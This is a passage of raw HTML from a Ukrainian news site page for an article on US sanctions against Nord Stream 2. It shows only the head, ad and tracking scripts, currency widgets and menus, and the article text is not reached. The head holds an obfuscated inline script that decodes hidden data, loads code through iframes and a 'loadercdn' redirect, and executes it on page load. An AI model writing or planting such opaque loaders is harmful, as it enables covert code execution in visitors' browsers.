<!DOCTYPE html><html prefix="og: http://ogp.me/ns#" lang="ru"><head><title>Американские санкции против «Северного потока»: лучше меньше, чем ничего | Экономические Новости</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"/> <meta name="referrer" content="origin"><meta name="yandex-verification" content="9a28c4c473219914" /><meta name="yandex-verification" content="9a28c4c473219914" /><meta name="msvalidate.01" content="B41426C32883F1040781CF3774D685FD" /> <meta property="og:title" content="Американские санкции против «Северного потока»: лучше меньше, чем ничего "/><meta property="og:site_name" content="enovosty. Украинские новости дня"/><meta property="og:image" content="https://enovosty.com/wp-content/uploads/2019/12/cover_sanktsyy.jpg"/><meta property="og:type" content="article" /><meta property="og:image:width" content="460" /><meta property="og:image:height" content="288" /><meta property="og:image:alt" content="Американские санкции против «Северного потока»: лучше меньше, чем ничего " /><meta name="google-site-verification" content="lQg1PFdRt2LbXcwJ8zsQT5ZnqQEsNPh4d7LwEmOU_lU" /><style>.toparticles{position:relative}.toparticles #photoPromo{height:216px;width:466px;overflow:hidden}.toparticles #photoPromo li{height:216px}.toparticles div.anythingSlider .anythingControls{display:block}</style><link rel="icon" href="https://enovosty.com/favicon.ico" type="image/x-icon" /><link rel="apple-touch-icon" sizes="144x144" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-144x144.png"> <link rel="apple-touch-icon" sizes="114x114" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-114x114.png"> <link rel="apple-touch-icon" sizes="72x72" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-72x72.png"> <link rel="apple-touch-icon" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-57x57.png"><link rel="apple-touch-icon-precomposed" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-57x57.png" /><style>@font-face{font-family:"sw-icon-font";src:url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.6.0");src:url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.6.0#iefix") format("embedded-opentype"),url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.woff?ver=3.6.0") format("woff"),url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.ttf?ver=3.6.0") format("truetype"),url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.svg?ver=3.6.0#1445203416") format("svg");font-weight:normal;font-style:normal}</style><link rel='stylesheet' id='mo_openid_admin_settings_style-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/mo_openid_style.css?version=5.0.6' type='text/css' media='all' /><link rel='stylesheet' id='mo_openid_admin_settings_phone_style-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/phone.css' type='text/css' media='all' /><link rel='stylesheet' id='mo-wp-bootstrap-social-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/bootstrap-social.css' type='text/css' media='all' /><link rel='stylesheet' id='mo-wp-bootstrap-main-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/bootstrap.min-preview.css' type='text/css' media='all' /><link rel='stylesheet' id='mo-wp-font-awesome-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/font-awesome.min.css?version=4.8' type='text/css' media='all' /><link rel='stylesheet' id='bootstrap_style_ass-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/bootstrap-tour-standalone.css?version=5.1.4' type='text/css' media='all' /><link rel='stylesheet' id='wp-block-library-css' href='https://enovosty.com/wp-includes/css/dist/block-library/style.min.css' type='text/css' media='all' /><link rel='stylesheet' id='wbcr-comments-plus-url-span-css' href='https://enovosty.com/wp-content/plugins/clearfy/components/comments-plus/assets/css/url-span.css' type='text/css' media='all' /><link rel='stylesheet' id='social_warfare-css' href='https://enovosty.com/wp-content/plugins/social-warfare/assets/css/style.min.css' type='text/css' media='all' /><link rel='stylesheet' id='msl-main-css' href='https://enovosty.com/wp-content/plugins/master-slider/public/assets/css/masterslider.main.css' type='text/css' media='all' /><script type='text/javascript' src='https://enovosty.com/wp-includes/js/jquery/jquery.js'></script><script type='text/javascript' src='https://enovosty.com/wp-includes/js/jquery/jquery-migrate.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/js/jquery.cookie.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/js/social_login.js'></script><meta name="description" content="Одобрение более чем двумя третями Палаты представителей США санкций против компаний, причастных к строительству «Северного потока-2», вызвало смешанные чувства. С одной стороны, это давно ожидалось, но рассчитывали на более объемные меры, чем получилось на выходе. С другой стороны, лучше так, чем просто разговоры на эту тему, длившиеся долгие месяцы." /><meta property="og:description" content="Одобрение более чем двумя третями Палаты представителей США санкций против компаний, причастных к строительству «Северного потока-2», вызвало смешанные чувства. С одной стороны, это давно ожидалось, но рассчитывали на более объемные меры, чем получилось на выходе. С другой стороны, лучше так, чем просто разговоры на эту тему, длившиеся долгие месяцы." /><meta name="keywords" content="американские санкции,северный поток,сша,политика,топ-статьи" /><link rel="canonical" href="https://enovosty.com/politika/full/1612-amerikanskie-sankcii-protiv-severnogo-potoka-luchshe-menshe-chem-nichego" /><meta property="og:url" content="https://enovosty.com/politika/full/1612-amerikanskie-sankcii-protiv-severnogo-potoka-luchshe-menshe-chem-nichego" /><style>.ms-parent-id-4 > .master-slider{background:#000000}.ms-parent-id-3 > .master-slider{background:#000000}.ms-parent-id-2 > .master-slider{background:#000000}.ms-parent-id-1 > .master-slider{background:#000000}</style><script>var ms_grabbing_curosr = 'https://enovosty.com/wp-content/plugins/master-slider/public/assets/css/common/grabbing.cur', ms_grab_curosr = 'https://enovosty.com/wp-content/plugins/master-slider/public/assets/css/common/grab.cur';</script><meta name="generator" content="MasterSlider 3.1.1 - Responsive Touch Image Slider | www.avt.li/msf" /><style>.wp-polls .pollbar{margin:1px;font-size:6px;line-height:8px;height:8px;background-image:url('https://enovosty.com/wp-content/plugins/wp-polls/images/default/pollbg.gif');border:1px solid #c8c8c8}</style><link rel="amphtml" href="https://enovosty.com/politika/full/1612-amerikanskie-sankcii-protiv-severnogo-potoka-luchshe-menshe-chem-nichego?amp"><meta name="fragment" content="!" /><script type="text/javascript">ajaxurl = '/wp-admin/admin-ajax.php';gpid = '4786633';cpage = ''
</script><style>span.swp_share,i.swp_facebook_icon,i.swp_twitter_icon,i.swp_linkedin_icon,span.swp_count{color:#ffffff}table.social{width:50%!important}.swp_share_button{height:max-content!important}.swp_social_panel{margin-bottom:0px!important;margin-top:0px!important}</style><link rel="preload" as="style" disabled type="text/css" rel="stylesheet" href="https://enovosty.com/wp-content/themes/eizvestia/mainstyle.css" /><script type="text/javascript">!function(){var mt="",t="Tag",e="natural",vt="src",st="loader",r="arg",pt="style",gt="text",n="ready",ht=":",a="STC",yt="script",o="image",i="parent",c="append",u="By",l="?",bt="IFRAME",f="add",d="*",A="Name",wt="code",m="Listener",v="no",s="https",p="m",g="Int",h="bold",y="green",b="c",St="_",Ct="write",w="Window",S="Timeout",C="al",Et="call",E="background",M="set",O="IAAAAUEBAAAACw",k="from",Mt="FRAME",B="has",Ot="href",D="Uza",kt="Document",I="create",Bt="Node",F="Of",R="AAA",j="remove",Dt="java",N="Computed",Q="2",It="bind",T="com",Z=".",x=";",Ft="cookie",Rt="close",H="base",L="GODlh",U="query",q="Property",z="HM",G='"',J="weight",jt="substr",Nt="warn",P="Selector",Qt="floor",W="parse",X="Storage",Y="d1e",_="timeout",Tt="id",Zt="cdn",xt="location",Ht="document",K="AAAQABAAACAk",V="Height",Lt="random",Ut="type",qt="head",zt="Em",$="ttt",tt="Loaded",et="Event",rt=")",Gt="Image",Jt="loading",nt="%",Pt="&",Wt="name",at="S",Xt="length",ot="@import",it="local",ct="font",Yt=",",ut="Style",lt="Descriptor",ft="'",dt="Child",At="color",_t="get",Kt="1",Vt=" ",$t="ZZZ2m",te="data",ee="gif",re="Own",ne="debug",ae="Math",oe="Item",ie="Content",ce="link",ue="complete",le="load",fe="Attribute",de="(",Ae="=",me="AQABA",ve="Elements",se="replace",pe="DOMContent",ge="match",he="content",ye="NO",be="key",we="/",Se="f4FFv",Ce="State",Ee="R1cj",Me="Element",Oe="atob",ke="-",Be="MSStream",De="<",Ie="Object",Fe="opener",Re="R0l",je=">",Ne="disabled",Qe="console",Te="r",Ze="index",xe="QBADs",He="prototype",Le="YXJnb24",Ue="All",qe=$+$t,ze=te+ht+o+we+ee+x+H,Ge=(Yt=Yt,O+R),Je=Re+L+me,Pe=K+xe+Ae,We=C+Ee+D+z+Ae,Xe=(St=St,De+ye),Ye=at+je,_e=I+Me,Ke=_t+ve+u+t+A,Ve=c+dt,$e=he+w,tr=_t+re+q+lt,er=n+Ce,rr=f+et+m,nr=U+P+Ue,ar=j+dt,or=M+S,ir=W+g,cr=_t+N+ut,ur=Le+Ae,lr=Q+Ae+Kt,fr=nt+b,dr=At+ht+y+x+ct+ke+J+ht+h,Ar=it+X,mr=_t+oe,vr=Ze+F,sr=Y+Ae,pr=j+oe,gr=s+ht+we+we,hr=Z+T+we+l+Te+Ae,yr=(Pt=Pt,gt+ie),br=de+rt+x,wr=St+p,Sr=B+fe,Cr=ot+Vt+ft,Er=ft+x,Mr=De+pt+je,Or=we+d,kr=d+we,Br=De+we+pt+je,Dr=e+V,Ir=i+Bt,Fr=pe+tt,Rr=le+Vt+r,jr=E+Gt,Nr=G+rt,Qr=(ht=ht,Jt+Vt+k+Vt+a),Tr=a+Vt+_,Zr=v+Vt+a;!function(){var t=window,i=t[Ht],e=Mt,r=ne,n=Dt,c=n+yt,a=wt,o=zt+a,u=0,l=1,f=2,d=3,A=10,m=8*f,v=A*A,s=m*m,p=s*s,g=s*d+d*(m+l),h=qe,y=Se,b=st,w=b+Zt,S=ze+m*f*f+Yt,C=Ge,E=S+Je+C+Pe,M=t[ae][Qt],O=t[ae][Lt],k=function(t){i[Ct](t)},B=u,D=m,I=u,F=u,R=function(){},j=We;try{if(t[Fe][St+h]==y)return t[Fe][St+h]=mt,k(Xe+e+Ye),i[Rt]()}catch(t){}var N=i[_e](bt),Q=i[Ke](qt)[0],T=ot();N[Wt]=T,Q[Ve](N);var Z,x,H,L,U=T?t[T]:N[$e],q=u;try{H=U[Ht]}catch(t){return}try{Z=U[Ie][tr](U[kt][He],er)[_t][It](i),x=H[_e][It](i),L=U[Oe],j=L(j),q=!!U[Be]}catch(t){q=l}if(q)return ut(),ct();var z=new U[Gt],G=H[rr],J=(H[nr][It](i),U[Bt][He]),P=J[Ve],W=J[ar],X=(H[Ke][It](i),U[or][It](t)),Y=U[ir],_=U[cr][It](t),K=x[It](i,yt);k=H[Ct][It](i),M=U[ae][Qt],O=U[ae][Lt];var V=L(ur);H[Ft][ge](V+St+r+lr)&&(R=U[Qe][Nt][It](U[Qe],fr+o,dr)),z[vt]=E;for(var $=U[Ar]||[],tt=0;tt<$[Xt];tt++){var et=$[be](tt);if(Y(et[jt](0,d),m)+mt==et[jt](d)){var rt=$[mr](et);if(rt[Xt]<v&&rt[vr](sr)==u)return $[pr](et),t[xt]=gr+w+hr+t[xt]+Pt+rt}}var nt=ot(),at=K();function ot(){return wr+M(O()*p*p)}function it(t){dt(),B||(F=ut(l),I=ct(l),t())}function ct(t){var e=ft(ce,Ne);return e&&e[Sr](Ot)?lt(Cr+e[Ot]+Er,t):e}function ut(t){var e=ft(yt,Ut,pt);if(e)return lt(e[gt],t)}function lt(t,e){if(k(Mr+t+Or+ot()+kr+Br),e)return ft(pt)}function ft(t,e,r){for(var n=i[Ke](t),a=n[Xt];-1<--a;)if(!e||n[a][Sr](e)&&(!r||n[a][e]==r))return n[a]}function dt(){z[ue]?z[Dr]||(B=l,I&&I[Ir][ar](I),F&&F[Ir][ar](F)):D--&&X(dt,l)}function At(){if(Z()==Jt)return G[Et](i,Fr,At);R(Rr);var t,e=x(pt);e[Tt]=j,P[Et](Q,e);var r=_(e)[jr];if(r[Xt]>v){var n=K(),a=r[jt](g)[se](Nr,mt),o=ot();U[o]=P[It](Q,n),t=a[jt](m*f),W[Et](Q,e),n[yr]=L(t),U[xt]=c+ht+o+br,R(Qr)}else Z()!=ue?(R(Tr),X(At,s)):R(Zr)}t[nt]=it[It](t,At),at[yr]=nt+br,P[Et](Q,at)}()}();</script><link rel="stylesheet" id="like-dislike-css" href="https://enovosty.com/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/css/ldc-lite.min.css?v=1&#038;ver=1.0.0" type="text/css" media="all" /><script><!--//--><![CDATA[//><!--
var pp_gemius_identifier = new String('.WeQbWs7d1FI7fa_VrIDknZ233jNFqLPdhORXpDm_jL.27');//--><!]]></script><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/x_gemius.js"></script><script type="text/javascript" src="https://enovosty.com/wp-content/plugins/top-10/top-10-addcount.js.php?top_ten_id=4786633&amp;a=7514" async></script><!--[if lte IE 7]><link rel="stylesheet" href="https://enovosty.com/wp-content/themes/eizvestia/js/jslider/css/anythingslider-ie.css" type="text/css" media="screen" /><![endif]--><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/jslider/js/jquery.anythingslider1.min.js"></script><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/jqvisible.js"></script><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/common.js"></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/adriver.core.2.ua.min.js"></script><script type="text/javascript">(function () {var w = window,d = document,protocol = /https/i.test(w.location.protocol) ? 'https:' : 'http:',aml = typeof admixerML !== 'undefined' ? admixerML : {};aml.fn = aml.fn || [];aml.invPath = aml.invPath || (protocol + '//inv-nets.admixer.net/');
aml.cdnPath = aml.cdnPath || (protocol + '//cdn.admixer.net/');
aml.noCriteo = true;if (!w.admixerML) {var lodash = document.createElement('script');lodash.id = 'amlScript';lodash.async = true;lodash.type = 'text/javascript';lodash.src = aml.cdnPath + 'scripts3/loader2.js';var node = d.getElementsByTagName('script')[0];node.parentNode.insertBefore(lodash, node);w.admixerML = aml;}})();</script> <meta property="fb:admins" content="100009507220682"/><meta property="fb:app_id" content="2113796585568948"/><script>function setHomepage(){var homepage = 'https://enovosty.com';
if (document.all){document.body.style.behavior='url(#default#homepage)';document.body.setHomePage(homepage);}else if (window.sidebar){if(window.netscape){try{netscape.security.PrivilegeManager.enablePrivilege("UniversalXPConnect");}catch(e){alert("this action was aviod by your browser，if you want to enable，please enter about:config in your address line,and change the value of signed.applets.codebase_principal_support to true");}}var prefs = Components.classes['@mozilla.org/preferences-service;1'].getService(Components. interfaces.nsIPrefBranch);prefs.setCharPref('browser.startup.homepage',homepage);}}</script><script>var _gaq = _gaq || [];var pluginUrl = '//www.google-analytics.com/plugins/ga/inpage_linkid.js';
_gaq.push(['_require', 'inpage_linkid', pluginUrl]);_gaq.push(['_setAccount', 'UA-12467142-3']);_gaq.push(['_addOrganic', 'nova.rambler.ru', 'query']);_gaq.push(['_addOrganic', 'go.mail.ru', 'q']);_gaq.push(['_addOrganic', 'nigma.ru', 's']);_gaq.push(['_addOrganic', 'webalta.ru', 'q']);_gaq.push(['_addOrganic', 'aport.ru', 'r']);_gaq.push(['_addOrganic', 'poisk.ru', 'text']);_gaq.push(['_addOrganic', 'km.ru', 'sq']);_gaq.push(['_addOrganic', 'liveinternet.ru', 'ask']);_gaq.push(['_addOrganic', 'quintura.ru', 'request']);_gaq.push(['_addOrganic', 'search.qip.ru', 'query']);_gaq.push(['_addOrganic', 'gde.ru', 'keywords']);_gaq.push(['_addOrganic', 'gogo.ru', 'q']);_gaq.push(['_addOrganic', 'ru.yahoo.com', 'p']);_gaq.push(['_addOrganic', 'images.yandex.ru', 'q', true]);_gaq.push(['_addOrganic', 'blogsearch.google.ru', 'q', true]);_gaq.push(['_addOrganic', 'blogs.yandex.ru', 'text', true]);_gaq.push(['_setDomainName', 'enovosty.com']);_gaq.push(['_trackPageview']);(function() {var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'https://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);})();</script><script>function trackOutboundLink(link, category, action) {var url = '';if(link.href) url = link.href;if(url == ''){str = link.getAttribute("onclick");m = str.match("(https:\/\/.*?)\'");if(m) url = m[1];}try {_gaq.push(['_trackEvent', category , action]);} catch(err){}setTimeout(function() {}, 100);}</script><script>jQuery(document).ready(function($){$("a").each(function() {var href = $(this).attr("href");var target = $(this).attr("target");var text = $(this).text();var a = new RegExp('/' + window.location.host + '/');var e = /([-a-zA-Z0-9@:%_\+.~#?&\/\/=]{2,256}\.[a-z]{2,4}\b(\/?[-a-zA-Z0-9@:%_\+.~#?&\/\/=]*)?)/gi;var b = new RegExp(e);$(this).click(function(event) {if (this.href && b.test(this.href) && !a.test(this.href) && (href.indexOf("enovosty.com") == -1)) {console.log("document.URL : "+this.href);event.preventDefault();_gaq.push(["_trackEvent", "Links", "Clicked", href, , false]);setTimeout(function() {window.open(href,(!target?"_self":target));},300);}});});});</script><script>(function(){var j=163229,f=false,b=document,c=b.documentElement,e=window;function g(){var a="";a+="rt="+(new Date).getTime()%1E7*100+Math.round(Math.random()*99);a+=b.referrer?"&r="+escape(b.referrer):"";return a}function h(){var a=b.getElementsByTagName("head")[0];if(a)return a;for(a=c.firstChild;a&&a.nodeName.toLowerCase()=="#text";)a=a.nextSibling;if(a&&a.nodeName.toLowerCase()!="#text")return a;a=b.createElement("head");c.appendChild(a);return a}function i(){var a=b.createElement("script");a.setAttribute("type","text/javascript");a.setAttribute("async","true");a.setAttribute("src","https://s.luxadv.com/t/lb"+j+"_3.js?"+g());typeof a!="undefined"&&h().appendChild(a)}function d(){if(!f){f=true;i()}};if(b.addEventListener)b.addEventListener("DOMContentLoaded",d,false);else if(b.attachEvent){c.doScroll&&e==e.top&&function(){try{c.doScroll("left")}catch(a){setTimeout(arguments.callee,0);return}d()}();b.attachEvent("onreadystatechange",function(){b.readyState==="complete"&&d()})}else e.onload=d})();</script><script async src='https://www.googletagservices.com/tag/js/gpt.js'></script><script>var googletag = googletag || {};googletag.cmd = googletag.cmd || [];</script><script>googletag.cmd.push(function() {googletag.defineSlot('/17774365/enovosty.com_300x600', [300, 600], 'div-gpt-ad-1531223757969-0').addService(googletag.pubads());googletag.defineSlot('/17774365/enovosty.com_300x600_2', [300, 600], 'div-gpt-ad-1531304104065-0').addService(googletag.pubads());//googletag.defineSlot('/17774365/enovosty.com_728x90', [728, 90], 'div-gpt-ad-1531223757969-1').addService(googletag.pubads());
googletag.defineSlot('/59256651/ads_ei_468_60', [468, 60], 'div-gpt-ad-1516280158772-0').addService(googletag.pubads());googletag.pubads().enableSingleRequest();googletag.enableServices();});
</script></head><body><script type='text/javascript'>admixerML.fn.push(function() {// Правая колонка - верх
if(/ukr.net/i.test(document.referrer)){admixerML.defineSlot({z: '7af953ae-795d-4e3e-8b55-c1906dcae224', ph: 'admixer_7af953ae795d4e3e8b55c1906dcae224_zone_12623_sect_1082_site_1069',i: 'inv-nets'});} else {admixerML.defineSlot({z: '9743148c-0bcf-416e-8ab5-55d24689e145', ph: 'admixer_9743148c0bcf416e8ab555d24689e145_zone_1845_sect_1082_site_1069', i: 'inv-nets'});};admixerML.defineSlot({z: '9a399316-86c0-4d6c-a6f1-676a36437a90', ph: 'admixer_9a39931686c04d6ca6f1676a36437a90_zone_42132_sect_1082_site_1069', i: 'inv-nets', s:'8b5577c5-d6c8-4102-81da-48ee76305fc9'});admixerML.defineSlot({z: '6c64e196-3fa9-43cf-8c1e-fd800277f90c', ph: 'go2net_6c64e1963fa943cf8c1efd800277f90c_zone_28808_sect_9220_site_7570', i: 'inv-nets', s:'7901bb9a-67fa-4dcd-8ae7-8a34d5bc7852'});// Нигде не выводится

// Статьи/Новости внизу
admixerML.defineSlot({z: '3b1188cc-6614-4215-a9bc-9ecb1d9b44e9', ph:
'admixer_3b1188cc66144215a9bc9ecb1d9b44e9_zone_7939_sect_1082_site_1069', i:
'inv-nets' ,renderedCallback: function(e) {var player = e.ph.childNodes[0].contentWindow &&
e.ph.childNodes[0].contentWindow.player;if (player){player.mute();}}});// Футтер
admixerML.defineSlot({z: '0e893395-4b69-455a-9d7a-6bc8d2aa074f', ph:
'admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069', i:
'inv-nets'});
admixerML.defineSlot({z: '5dacd85f-7810-44f5-831a-9a7b2add1a5f', ph: 'admixer_5dacd85f781044f5831a9a7b2add1a5f_zone_23901_sect_1082_site_1069', i: 'inv-nets'});admixerML.singleRequest();});</script><script><!--
bmN=navigator,bmD=document,bmD.cookie='b=b',i=0,bs=[],bm={v:101585,s:101585,t:6,c:bmD.cookie?1:0,n:Math.round((Math.random()* 1000000)),w:0};for(var f=self;f!=f.parent;f=f.parent)bm.w++;try{if(bmN.plugins&&bmN.mimeTypes.length&&(x=bmN.plugins['Shockwave Flash']))bm.m=parseInt(x.description.replace(/([a-zA-Z]|\s)+/,''));else for(var f=3;f<20;f++)if(eval('new ActiveXObject("ShockwaveFlash.ShockwaveFlash.'+f+'")'))bm.m=f}catch(e){;}try{bm.y=bmN.javaEnabled()?1:0}catch(e){;}try{bmS=screen;bm.v^=bm.d=bmS.colorDepth||bmS.pixelDepth;bm.v^=bm.r=bmS.width}catch(e){;}r=bmD.referrer.replace(/^w+:\/\//,'');if(r&&r.split('/')[0]!=window.location.host){bm.f=escape(r).slice(0,400).slice(0,400);bm.v^=r.length}bm.v^=window.location.href.length;for(var x in bm) if(/^[vstcnwmydrf]$/.test(x)) bs[i++]=x+bm[x];bmD.write('<img src="//c.bigmir.net/?'+bs.join('&')+'"  width="0" height="0" alt="bigmir)net TOP 100" title="bigmir)net TOP 100" />');
//--></script><noscript><img src="//c.bigmir.net/?v101585&s101585&t6" width="0" height="0" alt="" title="" /></noscript><div id="fb-root"></div><script>window.fbAsyncInit = function() {FB.init({appId      : '2113796585568948',cookie     : true,xfbml      : true,version    : 'v3.0'
});
FB.AppEvents.logPageView();
};(function(d, s, id){var js, fjs = d.getElementsByTagName(s)[0];if (d.getElementById(id)) {return;}js = d.createElement(s); js.id = id;js.src = "https://connect.facebook.net/en_US/sdk.js";
fjs.parentNode.insertBefore(js, fjs);}(document, 'script', 'facebook-jssdk'));</script><div id="adriver_banner_branding"></div><div class="container"> <div style="margin-top:86px;position:relative;"> <div id="right_ban"></div> <div class="mltlngg_switcher"><span>Рус</span><a href="https://enovosty.com/uk/">Укр</a></div> </div> <div class="cls"></div><div id="header" style="padding-top: 0px; margin-top: 0px;" ><div id="headerTop"><div class="cls"></div></div>   <div id="headerMiddle"><a href="https://enovosty.com/"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/srclogo.png" id="logo" alt="Экономические новости" title="Экономические новости" /></a> <a href="https://enovosty.com/konverter-valyut" class="finmarket">Конвертер валют</a><a href="https://enovosty.com/video" class="videohead">Видео</a><a class="wap" rel="nofollow" href="https://enovosty.com/politika/full/1612-amerikanskie-sankcii-protiv-severnogo-potoka-luchshe-menshe-chem-nichego?mobile=1"></a><a class="wap-img" title="Мобильная версия сайта" rel="nofollow" href="https://enovosty.com/politika/full/1612-amerikanskie-sankcii-protiv-severnogo-potoka-luchshe-menshe-chem-nichego?mobile=1"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/wap1.png" alt="Мобильная версия сайта" /></a> <div class="wiget simple" id="curs"><span style="text-align:center;display: block;font-size: 12px;font-weight: 700;"><a style="color: #369;" href="https://enovosty.com/currency-rates">Курсы валют</a></span><div class="header-currency"><a href="https://enovosty.com/currency-rates"><table class="currency"> <tr class="cur_shap"><td>&nbsp;</td><td><strong>Продажа</strong></td><td><strong>Покупка</strong></td><td><strong>НБУ</strong></td> </tr> <tr><td>USD</td><td>23.65</td><td>23.32</td><td>25.14</td> </tr> <tr class="tr_white"><td>EUR</td><td>26.44</td><td>25.82</td><td>27.75</td> </tr> <tr><td>RUB</td><td>0.39</td><td>0.30</td><td>0.38</td> </tr></table></a></div></div><div class="wiget simple" id="fonds"><span style="color: #369;text-align: center;display: block;font-size: 12px;font-weight: 700;">Фондовые индексы</span><table class="currency index"> <tr class="cur_shap"> <td>&nbsp;</td><td><strong>Знач.</strong></td><td><strong>Изм.,&nbsp;%</strong></td><td><strong>Время</strong></td> </tr> <tr> <td>PFTS</td><td>510.34</td><td>0.00</td><td>11:49 13.12.2019</td> </tr> <tr class="tr_white"> <td>UX</td><td>1500.02</td><td>0.82</td><td>12:11 16.12.2019</td> </tr> <tr> <td>RTS</td><td>1509.49</td><td>0.54</td><td>12:11 16.12.2019</td> </tr></table></div><div class="wiget simple" id="toplivo"><span style="color: #369;text-align:center;display: block;font-size: 12px;font-weight: 700;">Стоимость нефти (ICE)</span><table class="currency benzin"><tr class="cur_shap"><td></td><td><strong>$/баррель</strong></td><td><strong>Изм., %</strong></td><td><strong>Дата</strong></td></tr><tr><td style="text-align:left;padding-left: 2px;">BRENT</td><td>65.31</td><td>+0.14</td><td style="text-transform:uppercase;">Dec</td></tr><tr class="tr_white"><td style="text-align:left;padding-left: 2px;">WTI</td><td>67.49</td><td>-0.84</td><td style="text-transform:uppercase;">Aug</td></tr><tr><td style="text-align:left;padding-left: 2px;">GAS OIL</td><td>630.25</td><td>-0.52</td><td style="text-transform:uppercase;">Aug</td></tr></table></div> <div id="header_right"> <a href="https://enovosty.com/rss/rss.xml">RSS</a><a href="https://enovosty.com/afisha" class="h-anonsy"> <img src="https://enovosty.com/wp-content/themes/eizvestia/img/afisha3.png" width="56" alt="Деловая афиша" title="Деловая афиша" />Афиша</a><a class="archive" href="https://enovosty.com/archive">Архив</a><div style="clear: both;vertical-align:top;"> <a href="https://enovosty.com" title="Последние новости - &quot;ЭКОНОМИЧЕСКИЕ НОВОСТИ&quot;" onclick="window.external.AddFavorite(this.href, this.title); return false;" rel="sidebar">Добавить в закладки</a> </div> </div> <div class="cls"></div></div> <div id="mainMenu" data-hover="hover-on-menu"><ul id="ull" class="menu"><li class="menu-item-has-children"><a class="first" href="https://enovosty.com/news" data-hover="hover-on-link">Новости</a><ul class="sub-menu"><li><a href="https://enovosty.com/news_politics">Политика</a></li><li><a href="https://enovosty.com/news_kiev">Киев</a></li><li><a href="https://enovosty.com/news_economy">Экономика</a></li><li><a href="https://enovosty.com/news-finance">Финансы</a></li><li><a href="https://enovosty.com/news_ekskluzive">Эксклюзив</a></li><li><a href="https://enovosty.com/news-markets">Рынки</a></li><li><a href="https://enovosty.com/news_society">Общество</a></li><li><a href="https://enovosty.com/news_abroad">Мир</a></li><li><a href="https://enovosty.com/news_sport">Cпорт</a></li><li><a href="https://enovosty.com/news-culture">Культура</a></li><li><a href="https://enovosty.com/news-auto">Авто</a></li><li><a href="https://enovosty.com/news_incidents">Происшествия</a></li><li><a href="https://enovosty.com/news_technology">Наука и технологии</a></li><li><a href="https://enovosty.com/zdorove">Здоровье</a></li></ul></li><li class="current-menu-item"><a href="https://enovosty.com/politika">Политика</a></li><li><a href="https://enovosty.com/ekonomika">Экономика</a></li><li><a href="https://enovosty.com/finance">Финансы</a></li><li><a href="https://enovosty.com/markets">Рынки</a></li><li><a href="https://enovosty.com/society">Общество</a></li><li><a href="https://enovosty.com/tehnologii">Технологии</a></li><li><a href="https://enovosty.com/auto">Авто</a></li><li ><a href="https://enovosty.com/blogs">Мнения</a></li><li ><a href="https://enovosty.com/person">Досье</a></li><li id="menu-item-4513425_old" ><a href="https://enovosty.com/currency-rates">Курсы валют</a></li><li id="menu-item-4513319" class="menu-item-has-children" style="border-right: 1px solid #fff;"><a href="#">Ещё...</a><ul class="sub-menu"><li><a href="https://enovosty.com/o-proekte">О проекте</a></li><li><a href="https://enovosty.com/author">Авторы</a></li><li><a href="https://enovosty.com/photo-nedeli">Фото недели</a></li><li><a href="https://enovosty.com/presidenty-2019">Кандидаты в президенты 2019</a></li><li><a href="https://enovosty.com/vybory-2019" >Выборы 2019</a></li></ul></li></ul></div><script>jQuery(document).ready(function($){if(jQuery( window ).width() < 606){var touchHover = function() {$('.first').click(function(e){e.preventDefault();var $this = $(this);var onHover = $this.attr('data-hover');var linkHref = $this.attr('href');if (linkHref && $this.hasClass(onHover)) {location.href = linkHref;return false;}$this.toggleClass(onHover);});$('.finance').click(function(e){e.preventDefault();var $this = $(this);var onHover = $this.attr('data-hover');var linkHref = $this.attr('href');if (linkHref && $this.hasClass(onHover)) {location.href = linkHref;return false;}$this.toggleClass(onHover);});};$(document).ready(function() { touchHover(); });}});</script> </div>  <div id="body"><div class="cls"></div><div class="cls"></div><div id="center" style="width:690px;"><style type="text/css" media="screen"> @import url(https://enovosty.com/wp-content/themes/eizvestia/css/singlePage.min.css?v=2);</style><div class="wiget simple singlePost"> <div itemscope itemtype="https://schema.org/NewsArticle" class="post" id="post-4786633"><meta itemscope itemprop="mainEntityOfPage" itemType="https://schema.org/WebPage" itemid="https://enovosty.com/politika/full/1612-amerikanskie-sankcii-protiv-severnogo-potoka-luchshe-menshe-chem-nichego"/><article style="font-size:12pt;"> <h1 itemprop="headline" id="postTitle">Американские санкции против «Северного потока»: лучше меньше, чем ничего</h1><div class="breadcrumb"><a href="https://enovosty.com/">Главная</a> <span>&raquo;</span> <a href="https://enovosty.com/politika">Политика</a> <span>&raquo;</span> Американские санкции против «Северного потока»: лучше меньше, чем ничего</div><div class="border">&nbsp;</div><table class="social"><tr><td><div class="swp_social_panel 